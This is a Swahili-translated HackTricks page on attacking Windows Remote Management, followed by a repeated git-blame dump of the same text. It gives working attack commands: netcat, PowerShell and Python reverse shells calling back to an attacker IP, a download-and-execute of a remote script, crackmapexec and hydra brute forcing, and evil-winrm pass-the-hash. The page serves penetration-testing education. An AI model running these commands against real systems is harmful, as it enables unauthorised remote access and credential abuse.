hacktricks/network-services-pentesting/5985-5986-pentesting-winrm.md

# 5985,5986 - Kupima Usalama wa WinRM

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

**Machapisho Kuhusu Kudukua**\
Shiriki na yaliyomo yanayochunguza msisimko na changamoto za kudukua

**Habari za Kudukua za Wakati Halisi**\
Endelea kuwa na habari za ulimwengu wa kudukua kwa kasi kupitia habari na ufahamu wa wakati halisi

**Matangazo ya Hivi Karibuni**\
Baki na habari kuhusu uzinduzi wa tuzo za mdudu mpya na sasisho muhimu za jukwaa

**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!

## WinRM

[Udhibiti wa Mbali wa Windows (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) unasisitizwa kama **itifaki ya Microsoft** inayowezesha **udhibiti wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitegemea SOAP katika mchakato huo. Kimsingi, inatumia WMI, ikijitokeza kama kiolesura kinachotegemea HTTP kwa shughuli za WMI.

Kuwepo kwa WinRM kwenye kompyuta inaruhusu utawala wa mbali wa moja kwa moja kupitia PowerShell, kama vile SSH inavyofanya kazi kwa mifumo mingine ya uendeshaji. Ili kujua ikiwa WinRM inafanya kazi, ni muhimu kuangalia ufunguzi wa bandari maalum:

* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**

Ufunguzi wa bandari kutoka kwenye orodha hapo juu unaonyesha kuwa WinRM imeanzishwa, hivyo kuruhusu jaribio la kuanzisha kikao cha mbali.

### **Kuanzisha Kikao cha WinRM**

Ili kuwezesha PowerShell kwa WinRM, amri ya Microsoft `Enable-PSRemoting` inatumika, kuwezesha kompyuta kukubali amri za mbali za PowerShell. Kwa ufikiaji wa PowerShell ulioboreshwa, amri zifuatazo zinaweza kutekelezwa ili kuwezesha utendaji huu na kuweka mwenyeji yeyote kuwa waaminifu:
```powershell
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
Njia hii inahusisha kuongeza alama ya nukta nyingi kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatia kwa uangalifu kutokana na athari zake. Pia imebainishwa kuwa inaweza kuwa muhimu kubadilisha aina ya mtandao kutoka "Umma" hadi "Kazi" kwenye kompyuta ya mshambuliaji.

Zaidi ya hayo, WinRM inaweza **kuamilishwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa chini:
```powershell
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```
Njia hii inaruhusu usanidi wa mbali wa WinRM, kuongeza uwezo wa kusimamia mashine za Windows kutoka mbali.


### Angalia ikiwa imepangwa

Ili kuhakiki usanidi wa mashine yako ya shambulio, amri ya `Test-WSMan` hutumiwa kuangalia ikiwa lengo limepangwa vizuri na WinRM. Kwa kutekeleza amri hii, unapaswa kutarajia kupokea maelezo kuhusu toleo la itifaki na wsmid, ikionyesha usanidi uliofanikiwa. Hapa chini ni mifano inayoonyesha matokeo yanayotarajiwa kwa lengo lililopangwa dhidi ya moja ambayo haijapangwa vizuri:

- Kwa lengo ambalo **limepangwa** vizuri, matokeo yatafanana na haya:
```bash
Test-WSMan <target-ip>
```
Jibu litakuwa na habari kuhusu toleo la itifaki na wsmid, ikionyesha kuwa WinRM imefungwa kwa usahihi.

![](<../.gitbook/assets/image (161) (1).png>)

- Kwa upande mwingine, kwa lengo **sio** limefungwa kwa WinRM, hii itasababisha kukosekana kwa habari za kina kama hizo, ikionyesha kutokuwepo kwa ufungaji sahihi wa WinRM.

![](<../.gitbook/assets/image (162).png>)

### Tekeleza amri

Kutekeleza `ipconfig` kwa mbali kwenye kompyuta ya lengo na kuona matokeo yake, fanya yafuatayo:
```powershell
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
![](<../.gitbook/assets/image (163) (1).png>)

Unaweza pia **kutekeleza amri ya konsoli yako ya sasa ya PS kupitia** _**Invoke-Command**_. Fikiria una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya hivi:
```powershell
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
### Tekeleza Skripti

To execute a script on a remote Windows machine using WinRM, you can use the `Invoke-Command` cmdlet in PowerShell. This cmdlet allows you to run commands or scripts on remote computers.

Here is an example of how to execute a script using WinRM:

```powershell
Invoke-Command -ComputerName <target_ip> -ScriptBlock { <script_content> }
```

Replace `<target_ip>` with the IP address of the remote machine and `<script_content>` with the actual content of your script.

Make sure that WinRM is enabled on the target machine and that you have the necessary permissions to execute scripts remotely.
```powershell
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
### Pata kifaa cha kudhibiti kwa njia ya nyuma

To get a reverse shell, you can use the following methods:

#### Method 1: Netcat

1. Start a listener on your machine: `nc -lvp <port>`
2. Execute the following command on the target machine: `nc <your_ip> <port> -e /bin/bash`

#### Method 2: PowerShell

1. Start a listener on your machine: `nc -lvp <port>`
2. Execute the following command on the target machine: `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<your_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`

#### Method 3: Python

1. Start a listener on your machine: `nc -lvp <port>`
2. Execute the following command on the target machine: `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

Remember to replace `<port>` with the desired port number and `<your_ip>` with your machine's IP address.
```powershell
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### Pata kikao cha PS

Ili kupata kikao cha PowerShell kinachoweza kuingiliana, tumia `Enter-PSSession`:
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
```
![](<../.gitbook/assets/image (164).png>)

**Kikao kitakimbia katika mchakato mpya (wsmprovhost) ndani ya "mwathirika"**

### **Kulazimisha Kufunguliwa kwa WinRM**

Ili kutumia PS Remoting na WinRM lakini kompyuta haijasanidiwa, unaweza kuwezesha kwa:
```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
### Kuokoa na Kurudisha vikao

Hii **haitafanya kazi** ikiwa **lugha** imezuiliwa kwenye kompyuta ya mbali.
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
Ndani ya kikao hiki unaweza kupakia skripti za PS kwa kutumia _Invoke-Command_
```powershell
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
### Makosa

Ikiwa unapata kosa lifuatalo:

`enter-pssession : Kukamilisha uunganisho kwa seva ya mbali 10.10.10.175 kumeshindikana na ujumbe wa kosa lifuatalo: Mteja wa WinRM hauwezi kusindika ombi. Ikiwa mfumo wa uwakilishi ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijasajiliwa kwenye kikoa, basi usafirishaji wa HTTPS unapaswa kutumika au mashine ya marudio inapaswa kuongezwa kwenye mipangilio ya usanidi wa TrustedHosts. Tumia winrm.cmd kuweka mipangilio ya TrustedHosts. Kumbuka kuwa kompyuta kwenye orodha ya TrustedHosts huenda zisiwe na uwakilishi. Unaweza kupata habari zaidi kuhusu hilo kwa kukimbia amri ifuatayo: winrm help config. Kwa habari zaidi, angalia mada ya Msaada kuhusu Kutatua Matatizo ya Mbali.`

Jaribu kwenye mteja (taarifa kutoka [hapa](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)):
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa bug bounty!

**Machapisho ya Udukuzi**\
Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi

**Habari za Udukuzi za Waktu Halisi**\
Endelea kuwa na habari za ulimwengu wa udukuzi kwa kutumia habari na ufahamu wa wakati halisi

**Matangazo ya Hivi Karibuni**\
Baki na habari kuhusu bug bounties mpya zinazozinduliwa na sasisho muhimu za jukwaa

**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!

## Uhusiano wa WinRM kwenye linux

### Brute Force

Kuwa makini, kujaribu kuvunja nguvu winrm kunaweza kuzuia watumiaji.
```ruby
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
### Kutumia evil-winrm

Evil-winrm ni chombo cha nguvu kinachotumiwa katika uchunguzi wa usalama wa mtandao kwa kuingia kwa nguvu kwenye huduma ya WinRM. Inatoa njia rahisi ya kudhibiti na kuchunguza mifumo ya Windows kwa njia ya mbali.

Kuanza, unahitaji kujua anwani ya IP ya mfumo wa lengo na kuwa na ufikiaji wa mtandao kwa mfumo huo. Kisha, unaweza kutumia amri ifuatayo kuanzisha kikao cha WinRM:

```plaintext
evil-winrm -i <ip_address> -u <username> -p <password>
```

Badala ya kuingiza nenosiri moja kwa moja kwenye amri, unaweza pia kutumia faili ya nenosiri kwa njia ifuatayo:

```plaintext
evil-winrm -i <ip_address> -u <username> -P <password_file>
```

Baada ya kuanzisha kikao, unaweza kutumia amri za evil-winrm kufanya shughuli mbalimbali kwenye mfumo wa lengo. Kwa mfano, unaweza kuangalia habari ya mfumo kwa kutumia amri ifuatayo:

```plaintext
shell
sysinfo
```

Pia, unaweza kutekeleza amri za PowerShell kwa kutumia amri ifuatayo:

```plaintext
shell
powershell
```

Evil-winrm inatoa njia rahisi ya kuingia kwa nguvu kwenye huduma ya WinRM na kuchunguza mifumo ya Windows kwa njia ya mbali. Ni chombo muhimu katika uchunguzi wa usalama wa mtandao.
```ruby
gem install evil-winrm
```
Soma **nyaraka** kwenye github yake: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>
```
Kutumia evil-winrm kuunganisha kwenye anwani ya **IPv6**, tengeneza kuingiza ndani ya _**/etc/hosts**_ kuweka **jina la kikoa** kwa anwani ya IPv6 na uunganishe kwenye kikoa hicho.

### Pita hash na evil-winrm
```ruby
evil-winrm -u <username> -H <Hash> -i <IP>
```
![](<../.gitbook/assets/image (173).png>)

### Kutumia kifaa cha PS-docker
```
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
### Kutumia skripti ya ruby

**Msimbo umetolewa hapa: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)**
```ruby
require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/


conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)


class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end


command=""
file_manager = WinRM::FS::FileManager.new(conn)


conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end
```
## Shodan

* `port:5985 Microsoft-HTTPAPI`

## Marejeo

* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)

## Amri za Kiotomatiki za HackTricks
```
Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number:  5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment        #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.

sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’

https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/

ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory        or -s to upload scripts (sherlock)
menu
invoke-binary `tab`

#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))

https://book.hacktricks.xyz/pentesting/pentesting-winrm

Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
```
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

**Machapisho ya Udukuzi**\
Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi

**Habari za Udukuzi za Waktu Halisi**\
Endelea kuwa na habari za ulimwengu wa udukuzi kwa kutumia habari na ufahamu wa wakati halisi

**Matangazo ya Hivi Karibuni**\
Baki na habari kuhusu tuzo za mdudu zinazoanzishwa na sasisho muhimu za jukwaa

**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!

<details>

<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								# 5985,5986 - Kupima Usalama wa WinRM
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia nyingine za kusaidia HackTricks:
-												arte

											
										
										
											2024-01-03 10:42:55 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
 								* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
 								* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												hackenproof

											
										
										
											2023-12-04 15:45:05 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Machapisho Kuhusu Kudukua**\
 								Shiriki na yaliyomo yanayochunguza msisimko na changamoto za kudukua
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Habari za Kudukua za Wakati Halisi**\
 								Endelea kuwa na habari za ulimwengu wa kudukua kwa kasi kupitia habari na ufahamu wa wakati halisi
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Matangazo ya Hivi Karibuni**\
 								Baki na habari kuhusu uzinduzi wa tuzo za mdudu mpya na sasisho muhimu za jukwaa
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												GitBook: [#3340] No subject

											
										
										
											2022-07-28 09:46:19 +00:00
+								## WinRM
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[Udhibiti wa Mbali wa Windows (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) unasisitizwa kama **itifaki ya Microsoft** inayowezesha **udhibiti wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitegemea SOAP katika mchakato huo. Kimsingi, inatumia WMI, ikijitokeza kama kiolesura kinachotegemea HTTP kwa shughuli za WMI.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kuwepo kwa WinRM kwenye kompyuta inaruhusu utawala wa mbali wa moja kwa moja kupitia PowerShell, kama vile SSH inavyofanya kazi kwa mifumo mingine ya uendeshaji. Ili kujua ikiwa WinRM inafanya kazi, ni muhimu kuangalia ufunguzi wa bandari maalum:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								* **5985/tcp (HTTP)**
 								* **5986/tcp (HTTPS)**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ufunguzi wa bandari kutoka kwenye orodha hapo juu unaonyesha kuwa WinRM imeanzishwa, hivyo kuruhusu jaribio la kuanzisha kikao cha mbali.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### **Kuanzisha Kikao cha WinRM**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ili kuwezesha PowerShell kwa WinRM, amri ya Microsoft `Enable-PSRemoting` inatumika, kuwezesha kompyuta kukubali amri za mbali za PowerShell. Kwa ufikiaji wa PowerShell ulioboreshwa, amri zifuatazo zinaweza kutekelezwa ili kuwezesha utendaji huu na kuweka mwenyeji yeyote kuwa waaminifu:
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Enable-PSRemoting -Force
 								Set-Item wsman:\localhost\client\trustedhosts *
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia hii inahusisha kuongeza alama ya nukta nyingi kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatia kwa uangalifu kutokana na athari zake. Pia imebainishwa kuwa inaweza kuwa muhimu kubadilisha aina ya mtandao kutoka "Umma" hadi "Kazi" kwenye kompyuta ya mshambuliaji.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Zaidi ya hayo, WinRM inaweza **kuamilishwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa chini:
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia hii inaruhusu usanidi wa mbali wa WinRM, kuongeza uwezo wa kusimamia mashine za Windows kutoka mbali.
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Angalia ikiwa imepangwa
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ili kuhakiki usanidi wa mashine yako ya shambulio, amri ya `Test-WSMan` hutumiwa kuangalia ikiwa lengo limepangwa vizuri na WinRM. Kwa kutekeleza amri hii, unapaswa kutarajia kupokea maelezo kuhusu toleo la itifaki na wsmid, ikionyesha usanidi uliofanikiwa. Hapa chini ni mifano inayoonyesha matokeo yanayotarajiwa kwa lengo lililopangwa dhidi ya moja ambayo haijapangwa vizuri:
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								- Kwa lengo ambalo **limepangwa** vizuri, matokeo yatafanana na haya:
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```bash
 								Test-WSMan <target-ip>
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Jibu litakuwa na habari kuhusu toleo la itifaki na wsmid, ikionyesha kuwa WinRM imefungwa kwa usahihi.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3523] No subject

											
										
										
											2022-09-30 10:43:59 +00:00
+								![](<../.gitbook/assets/image (161) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								- Kwa upande mwingine, kwa lengo **sio** limefungwa kwa WinRM, hii itasababisha kukosekana kwa habari za kina kama hizo, ikionyesha kutokuwepo kwa ufungaji sahihi wa WinRM.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								![](<../.gitbook/assets/image (162).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Tekeleza amri
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kutekeleza `ipconfig` kwa mbali kwenye kompyuta ya lengo na kuona matokeo yake, fanya yafuatayo:
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
+								```powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
 								```
-												GitBook: [#3340] No subject

											
										
										
											2022-07-28 09:46:19 +00:00
+								![](<../.gitbook/assets/image (163) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza pia **kutekeleza amri ya konsoli yako ya sasa ya PS kupitia** _**Invoke-Command**_. Fikiria una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya hivi:
-												a

											
										
										
											2024-02-08 21:36:35 +00:00
